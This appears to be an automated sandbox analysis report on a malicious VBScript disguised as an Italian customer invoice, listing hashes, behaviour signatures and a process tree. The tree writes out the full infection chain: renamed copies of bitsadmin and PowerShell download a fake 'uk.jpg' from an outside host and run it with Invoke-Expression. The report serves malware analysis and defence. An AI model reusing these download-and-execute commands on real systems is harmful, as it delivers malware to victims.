Analysis
max time kernel: 63s
max time network: 33s
platform: windows7_x64
resource: win7
submitted: 13-07-2020 07:18
Static task: static1
Behavioral task: behavioral1
  Sample: Fatt_cliente_00453830309.vbs
  Resource: win7
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: Fatt_cliente_00453830309.vbs
  Resource: win10v200430
  0 signatures, 0 seconds
General
Target: Fatt_cliente_00453830309.vbs
Size: 3KB
MD5: 62b3b8b5c2ceacaee5e3e22939c45a43
SHA1: 3a579492c1c373cb61ced3c7a88cffb13d73e1ac
SHA256: 77e7a4deb92496d0954a6fd03cece71dfd53bc774cfb89dc16410c91cf09f598
SHA512: 0b969e6f0163f22402bfb31f424ff33b8985a1406fd65936e4239b31ba1b75501cbea31bd944cd02c97d88e707e08097b83b8b258e2352b4f92286e09fac93d1
Score: 8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes: WScript.exe
  description                       pid   process      target process
  PID 1108 wrote to memory of 1432  1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 1432  1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 1432  1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 676   1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 676   1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 676   1108  WScript.exe  cmd.exe
  PID 1108 wrote to memory of 368   1108  WScript.exe  FeUgzu.exe
  PID 1108 wrote to memory of 368   1108  WScript.exe  FeUgzu.exe
  PID 1108 wrote to memory of 368   1108  WScript.exe  FeUgzu.exe
  PID 1108 wrote to memory of 368   1108  WScript.exe  FeUgzu.exe
  PID 1108 wrote to memory of 1860  1108  WScript.exe  zFeUgzu.exe
  PID 1108 wrote to memory of 1860  1108  WScript.exe  zFeUgzu.exe
  PID 1108 wrote to memory of 1860  1108  WScript.exe  zFeUgzu.exe
  PID 1108 wrote to memory of 1860  1108  WScript.exe  zFeUgzu.exe
- Executes dropped EXE (2 IoCs)
  Processes: FeUgzu.exe, zFeUgzu.exe
  pid   process
  368   FeUgzu.exe
  1860  zFeUgzu.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: zFeUgzu.exe
  description              pid   process
  Token: SeDebugPrivilege  1860  zFeUgzu.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: zFeUgzu.exe
  pid   process
  1860  zFeUgzu.exe
  1860  zFeUgzu.exe
Processes (indentation shows the process tree; depth markers from the original report replaced by nesting)
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_00453830309.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zFeUgzu.exe
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\FeUgzu.exe
  - C:\Users\Admin\AppData\Roaming\FeUgzu.exe
    "C:\Users\Admin\AppData\Roaming\FeUgzu.exe" /transfer DQeUoq /download https://sheyenneweber.com/webol/00453830309/uk.jpg C:\Users\Admin\AppData\Roaming\uk.jpg
    - Executes dropped EXE
  - C:\Users\Admin\AppData\Roaming\zFeUgzu.exe
    "C:\Users\Admin\AppData\Roaming\zFeUgzu.exe" -c &{$us=gc C:\Users\Admin\AppData\Roaming\uk.jpg| Out-String; Invoke-Expression $us }
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Roaming\FeUgzu.exe
- C:\Users\Admin\AppData\Roaming\zFeUgzu.exe
- memory/368-3-0x0000000000000000-mapping.dmp
- memory/676-1-0x0000000000000000-mapping.dmp
- memory/1108-10-0x0000000002510000-0x0000000002514000-memory.dmp (Filesize: 16KB)
- memory/1432-0-0x0000000000000000-mapping.dmp
- memory/1860-6-0x0000000000000000-mapping.dmp